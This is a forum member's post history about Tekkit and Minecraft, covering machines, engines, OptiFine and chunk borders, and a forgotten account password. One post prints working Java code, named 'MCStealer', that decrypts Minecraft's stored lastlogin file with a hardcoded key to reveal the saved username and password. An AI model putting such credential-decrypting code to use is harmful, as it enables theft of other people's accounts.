Jump to content

Lucas Souza

Members
  • Posts

    16
  • Joined

  • Last visited

Everything posted by Lucas Souza

  1. I have a lot of cows in my farm so I decide to use the Sewer to produce Sewage and create fertilazer with the composter, but the Sewer stop work after 15 buckets, why? (for put it back to work I destroy then and put it back, I use a silver upgrade, idk if it change something)
  2. I know that, the problem is that when I put the Optifine the F9 don't work
  3. Sphax, but for testing I don't use it and the F9 don't work too, very strange
  4. Was because of the OptiFine, but I want to use both, the texture pack and the F9 thing
  5. I try to fix it with the backup of my modpack file, but know i'm withou the Optifine, so I can't use my texture pack, how I fix it without lost my Optifine?
  6. I was pressing the F9 button to see the chunks marks and use this for organizate my quarry perfectly in the world, but I don't know why, it's not working anymore, anyone know why?
  7. In my opnion the best way is a mix with the Magmatic engines and the Combustion engines, I use a mix because I only find 2 oil souce and I use Oil Refinery, because with fuel the Combustion engine produce 6 MJ/t, 2 more comparing to Magmatic engines
  8. No, I'm not, I don't know which of my e-mails I put, I had almost sure that was the hotmail one, but it's not, one time I tell a friend of mine my password, and I changed it, but download the tekkit, so I didn't write the password for a long time and forgot, I THINK that my friend change my e-mail, but I don't know, because the password still the same .-.
  9. It remember me of Direwolf20, he did that with one mod that teleport the turtles :)
  10. Thanks very much Spudgy, you help a lot! {But unfortunately I don't know, yet, how to use it, before know tekkit I only knew industrialcraft, steves carts, buildcraft and computercraft...}
  11. I have more than 500.000 cobblestones in my Deep Storage Unit, I want to turn it all in diamonds with some Minium Stones, so I try to use the AutoCrafting Table from BuildCraft, but it didn't work, someone knows a way for use the Minium Stone automatically, without I craft everything?
  12. Yes, it work, but I don't want to put mods in the vanilla of the launcher, but I don't have another choice I see, so I will save my lastlogin and use it instead of recovery my password
  13. I can use, I'm using it, but only in tekkit, that is the problem, I want to use in the normal minecraft, but for this I have to recovery my password
  14. I know that, I move the lastlogin to the .minecraft folder and I use this code: import java.io.*; import java.net.*; import java.util.*; import javax.crypto.*; import javax.crypto.spec.*; public class MCExploit { public static void main(String[] args) throws Exception { System.out.println(MCStealer()); } public static String MCStealer() throws Exception { String output = null; Random random = new Random(43287234L); byte[] salt = new byte[8]; random.nextBytes(salt); PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5); SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray())); Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES"); cipher.init(2, pbeKey, pbeParamSpec); if (getWorkingDirectory().exists()) { File lastLogin = new File(getWorkingDirectory(), "lastlogin"); DataInputStream dis = new DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher)); output = dis.readUTF() + " | " + dis.readUTF(); dis.close(); } return output; } public static File getWorkingDirectory() { String userHome = System.getProperty("user.home", "."); File workingDirectory; switch (getPlatform()) { case 1: case 2: workingDirectory = new File(userHome, ".minecraft/"); break; case 3: String applicationData = System.getenv("APPDATA"); if (applicationData != null) workingDirectory = new File(applicationData, ".minecraft/"); else workingDirectory = new File(userHome, ".minecraft/"); break; case 4: workingDirectory = new File(userHome, "Library/Application Support/minecraft"); break; default: workingDirectory = new File(userHome, ".minecraft/"); } return workingDirectory; } private static int getPlatform() { String osName = System.getProperty("os.name").toLowerCase(); if (osName.contains("linux")) return 1; if (osName.contains("unix")) return 1; if (osName.contains("solaris")) return 2; if (osName.contains("sunos")) return 2; if (osName.contains("win")) return 3; if (osName.contains("mac")) return 4; return 5; } } And yes, it's true --' But that code doesn't work in tekkit, only minecraft
  15. I'm sorry if this is not the right place to put this topic, but I don't know what to do anymore, I forgot my password and I know a little bit of JAVA, so I try to hack the login file to recovery my password, but I only know how to do that on a minecraft loginfile, in tekkit I don't have an ideia, I try a million times 'forget my password' on the minecraft.net, but nothing help, please, someone, help me...
×
×
  • Create New...